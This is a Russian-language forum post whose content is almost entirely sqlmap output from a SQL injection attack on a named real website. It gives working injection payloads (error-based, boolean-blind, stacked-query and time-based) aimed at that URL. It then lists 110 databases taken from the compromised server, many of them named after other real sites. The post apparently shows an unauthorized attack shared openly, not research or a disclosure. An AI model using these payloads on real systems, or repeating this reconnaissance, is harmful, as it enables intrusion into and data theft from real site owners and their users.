Показать сообщение отдельно

  #4  
Старый 20.10.2018, 03:59
lukeone
Новичок
Регистрация: 07.05.2017
Сообщений: 6
Провел на форуме:
2109

Репутация: 1
По умолчанию

Код:
http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
.SpoilerTarget" type="button">Spoiler: from sqlmap
Parameter: #1* (URI)

Type: boolean-based blind

Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)

Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK

Vector: AND MAKE_SET([INFERENCE],[RANDNUM])

Type: error-based

Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW

Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (comment)

Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#

Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#

Type: AND/OR time-based blind

Title: MySQL >= 5.0.12 AND time-based blind

Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV

Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

.SpoilerTarget" type="button">Spoiler: bd
available databases [110]:
[*] 1poverennaya.ru
[*] 3dschool.akadem-art.ru
[*] acmoda_fashion
[*] akadem-art.ru
[*] amsterdam.ru
[*] amur-tiger
[*] api.olit.su
[*] apteki.ru
[*] at
[*] ayashiclimat
[*] berendeevo
[*] bitrix_55
[*] cargoflies.ru
[*] civlife
[*] cookies
[*] cpa
[*] cpa-monsters.ru
[*] crypto
[*] cv79250_db
[*] db1050525_rpfm
[*] dev.check-car.io
[*] dish.ru
[*] docdoc
[*] dojoy.ru
[*] dreamwood
[*] el-torg.ru
[*] fefectu_fikcii
[*] game4art.ru
[*] gidrolica
[*] greencontinent.bio
[*] hockeyfamily
[*] hostel
[*] information_schema
[*] informed
[*] irasmarovoz
[*] kordik-psyhelp
[*] kz_health
[*] lecture
[*] led1080.ru
[*] lesspas
[*] light
[*] lotmo
[*] mailer
[*] maxphoto
[*] medelement.ru
[*] messenger
[*] metalnastil.ru
[*] miel.ru
[*] modelery
[*] mototelega
[*] mysql
[*] nanokeratin-shop
[*] new.olit.su
[*] new_olit
[*] newoleg
[*] olit_su
[*] olmatveeva.ru
[*] pdns
[*] performance_schema
[*] photoluxor
[*] picture
[*] pineapple
[*] powerdns
[*] prazdnik
[*] pressnastil.ru
[*] profdoctors.ru
[*] push
[*] radio.ru
[*] recraft.ru-yii
[*] redmine
[*] rekomendacii
[*] remcraft.ru
[*] remcraft.ru-new
[*] remcraft.ru-new1!!
[*] resthistory
[*] rlogistika
[*] seobirds
[*] seorakerus
[*] seowant.ru
[*] sflegaladvice
[*] siluet.su
[*] sitemanager0
[*] skld
[*] social
[*] sound_olit
[*] sound_olit_su
[*] sport
[*] spz-rus.ru
[*] stroynastil.ru
[*] stroynastil.ru1
[*] sveng
[*] telegramm
[*] test
[*] umgear.ru
[*] union.ru
[*] union.ru-old
[*] vault-pdm.ru
[*] velespro.com
[*] videoportal
[*] visagestyle
[*] water-check.ru
[*] wawtalk.io
[*] webmonsters
[*] whoknow.ru
[*] yandex_bot
[*] yiilab
[*] ymga.ru
[*] ymga.ru-new
[*] zabbix
[*] zaem-info.ru
 
Ответить с цитированием